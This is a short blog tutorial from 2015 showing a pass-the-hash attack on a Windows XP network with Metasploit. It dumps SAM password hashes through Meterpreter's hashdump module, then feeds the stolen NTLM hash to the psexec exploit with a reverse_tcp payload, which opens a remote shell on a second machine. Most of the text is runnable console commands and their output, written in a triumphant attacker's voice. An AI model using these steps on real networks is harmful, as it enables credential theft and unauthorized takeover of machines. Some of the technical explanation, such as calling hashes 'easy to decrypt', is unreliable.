Ready to Start Your Career?
By: Multi Thinker
July 14, 2015
Pass The Hash
By: Multi Thinker
July 14, 2015
Hi once again,Using this method, all we need is an
SMB ( LAN )fully compromised PC user-name, as we have recently exploited WindowsXp SP 2. Now that we know his user-name, we need to move into the LAN to other PCs.Let's begin...Running the
Metasploitconsole, I assume you have
Metasploitopened and have configured our target there. So, let us start with
Meterpreter. I will now write a plain/full terminal command because you know the basics.We're going to use
"post/windows/gather/hashdump"You can locate it by locating/ searching in terminal. We have accessed CMD recently. We can even cat system login information file ( named / known as
SAM). His hash will be in the format of
NTMLwhich is easy to decrypt. But, in our purpose we need to pass the hash directly to it, so we need to use the hashdump in terminal.
meterpreter > run post/windows/gather/hashdump[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...[*] Obtaining the user list and keys...[*] Decrypting user keys...[*] Dumping password hashes...Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::Knowing that we have the hash, let's use `psexec exploit` to pass that. Open one more terminal in a new instance and open msf console there. We know we need to use `psexec` but we didn't know his location / full path. Let's search for it.
msf > search psexecExploits========Name Description---- -----------windows/smb/psexec Microsoft Windows Authenticated User Code Executionwindows/smb/smb_relay Microsoft Windows SMB Relay Code ExecutionYES! We got it. Now, let's use it.
msf > use exploit/windows/smb/psexecmsf exploit(psexec) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(psexec) > set LHOST xx.xx.xx.xxLHOST => xx.xx.xx.xxmsf exploit(psexec) > set LPORT 443LPORT => 443msf exploit(psexec) > set RHOST xx.xx.xx.xxRHOST => xx.xx.xx.xxmsf exploit(psexec) > show optionsModule options:Name Current Setting Required Description---- --------------- -------- -----------RHOST xx.xx.xx.xx yes The target addressRPORT 445 yes Set the SMB service portSMBPass no The password for the specified usernameSMBUser Administrator yes The username to authenticate asPayload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC thread yes Exit technique: seh, thread, processLHOST xx.xx.xx.xx yes The local addressLPORT 443 yes The local portExploit target:Id Name-- ----0 AutomaticSet the SMBPassmsf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586cSMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586cmsf exploit(psexec) > exploit[*] Connecting to the server...[*] Started reverse handler[*] Authenticating as user 'Administrator'...[*] Uploading payload...[*] Created KoVCxCjx.exe...[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:xx.xx.xx.xx[svcctl] ...[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:xx.xx.xx.xx[svcctl] ...[*] Obtaining a service manager handle...[*] Creating a new service (XKqtKinn - "MSSeYtOQydnRPWl")...[*] Closing service handle...[*] Opening service...[*] Starting the service...[*] Removing the service...[*] Closing service handle...[*] Deleting KoVCxCjx.exe...[*] Sending stage (719360 bytes)[*] Meterpreter session 1 opened (xx.xx.xx.xx:443 -> xx.xx.xx.xx:1045)Yeah! We got it.
meterpreter > shellProcess 3680 created.Channel 1 created.Microsoft Windows [Version 5.2.3790](C) Copyright 1985-2003 Microsoft Corp.C:WINDOWSsystem32>Voila! One more down. Now we have full access to it.-- Multi Thinker